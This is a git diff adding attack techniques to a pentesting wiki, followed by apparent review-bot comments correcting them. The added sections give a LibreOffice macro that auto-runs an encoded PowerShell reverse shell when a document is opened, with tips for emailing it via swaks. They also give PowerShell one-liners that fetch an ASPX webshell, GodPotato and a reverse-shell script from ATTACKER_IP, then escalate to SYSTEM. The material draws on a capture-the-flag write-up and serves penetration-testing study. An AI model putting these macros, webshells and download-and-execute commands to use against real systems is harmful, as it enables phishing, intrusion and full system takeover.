diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 8b0fe3a3c42..3f733b1ce5b 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -83,6 +83,23 @@ Do this because you **can't save macro's inside a `.docx`** and there's a **stig - [**macphish**](https://github.com/cldrn/macphish) - [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) +## LibreOffice ODT auto-run macros (Basic) + +LibreOffice Writer documents can embed Basic macros and auto-execute them when the file is opened by binding the macro to the **Open Document** event (Tools → Customize → Events → Open Document → Macro…). A simple reverse shell macro looks like: + +```vb +Sub Shell + Shell("cmd /c powershell -enc BASE64_PAYLOAD"""") +End Sub +``` + +Note the doubled quotes (`""`) inside the string – LibreOffice Basic uses them to escape literal quotes, so payloads that end with `...==""")` keep both the inner command and the Shell argument balanced. + +Delivery tips: + +- Save as `.odt` and bind the macro to the document event so it fires immediately when opened. +- When emailing with `swaks`, use `--attach @resume.odt` (the `@` is required so the file bytes, not the filename string, are sent as the attachment). This is critical when abusing SMTP servers that accept arbitrary `RCPT TO` recipients without validation. + ## HTA Files An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model. 
@@ -293,6 +310,7 @@ Check the page about **places to steal NTLM creds**: ## References +- [HTB Job – LibreOffice macro → IIS webshell → GodPotato](https://0xdf.gitlab.io/2026/01/26/htb-job.html) - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) - [Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers](https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/) diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index cd338fcd77f..3820f573743 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md 
@@ -9,6 +9,20 @@ Test executable file extensions: - config - php +## Writable webroot → ASPX command shell + +If a low-privileged user/group has **write access to `C:\inetpub\wwwroot`**, you can drop an ASPX webshell and execute OS commands as the application pool identity (often holding **SeImpersonatePrivilege**). + +- Verify ACLs: `icacls C:\inetpub\wwwroot` or `cacls .` looking for `(F)` on your user/group. +- Upload a command webshell (e.g., fuzzdb/tennc `cmd.aspx`) using PowerShell: + +```powershell +iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx +``` + +- Request `/shell.aspx` and run commands; identity typically shows `iis apppool\defaultapppool`. +- Combine with Potato-family LPE (e.g., GodPotato/SigmaPotato) when the AppPool token has SeImpersonatePrivilege to pivot to SYSTEM. + ## Internal IP Address disclosure On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address: @@ -409,6 +423,7 @@ HTTP/1.1 200 OK ## References +- [0xdf – HTB Job (IIS write → ASPX shell → GodPotato)](https://0xdf.gitlab.io/2026/01/26/htb-job.html) - [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/) - [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md) diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index b5d5208eef4..e93135cc39e 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md 
@@ -160,6 +160,16 @@ EfsPotato [pipe] Notes: - Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present. +- Grab the binary that matches the installed runtime (e.g., `GodPotato-NET4.exe` on modern Server 2022). +- If your initial execution primitive is a webshell/UI with short timeouts, stage the payload as a script and ask GodPotato to run it instead of a long inline command. + +Quick staging pattern from a writable IIS webroot: + +```powershell +iwr http://ATTACKER_IP/GodPotato-NET4.exe -OutFile gp.exe +iwr http://ATTACKER_IP/shell.ps1 -OutFile shell.ps1 # contains your revshell +./gp.exe -cmd "powershell -ep bypass C:\inetpub\wwwroot\shell.ps1" +``` ### DCOMPotato @@ -201,6 +211,7 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an - [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/) - [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers) - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) +- [HTB: Job — LibreOffice macro → IIS webshell → GodPotato to SYSTEM](https://0xdf.gitlab.io/2026/01/26/htb-job.html) - [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato) - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
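Review bot: in the `phishing-documents.md` LibreOffice hunk the macro sample and its explanation disagree on the quoting. The snippet ends with `BASE64_PAYLOAD"""")` (four quotes, which Basic reads as two escaped `""` pairs, leaving the string literal unterminated), while the paragraph below describes payloads ending in `...==""")` (one escaped pair plus the closing quote); pick one form and make the snippet match the text. Naming the procedure `Sub Shell` also shadows the Basic `Shell` function it calls on the next line, so rename it (e.g. `Sub Main`) to avoid the ambiguity. The section should further state at which macro security level the Open Document binding actually fires: LibreOffice's default level (High) refuses unsigned macros from untrusted locations, and that default is the mitigation a reader of this page needs to know about. Finally, the bullet about `swaks` and SMTP servers accepting arbitrary `RCPT TO` is SMTP-delivery material, not document-building material; move it to the SMTP page and cross-link it from here.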
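Review bot: in the `iis-internet-information-services.md` hunk the ACL check is too narrow: `icacls` reports write access through `(M)`, `(W)` and `(WD)` as well as `(F)`, so telling the reader to look only for `(F)` will miss writable webroots; `cacls` is deprecated and can be dropped in favour of `icacls` alone. The `iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx` step presupposes an existing command-execution primitive on the host, which the heading "Writable webroot" does not convey; state that prerequisite up front. The last bullet name-drops GodPotato/SigmaPotato, but this same patch edits `roguepotato-and-printspoofer.md`, so link that page instead of leaving a bare mention.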
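Review bot: in the `roguepotato-and-printspoofer.md` staging block the paths are inconsistent: the two `iwr` lines save to the relative `gp.exe` and `shell.ps1` (the current working directory), but the `-cmd` string references the absolute `C:\inetpub\wwwroot\shell.ps1`, so the pattern only works when the working directory happens to be the webroot the lead sentence mentions. Use absolute paths in all three lines (e.g. `-OutFile C:\inetpub\wwwroot\shell.ps1`). Prefer `powershell -ep bypass -File C:\inetpub\wwwroot\shell.ps1` as well; without `-File` the path is parsed as a command expression and breaks on paths containing spaces.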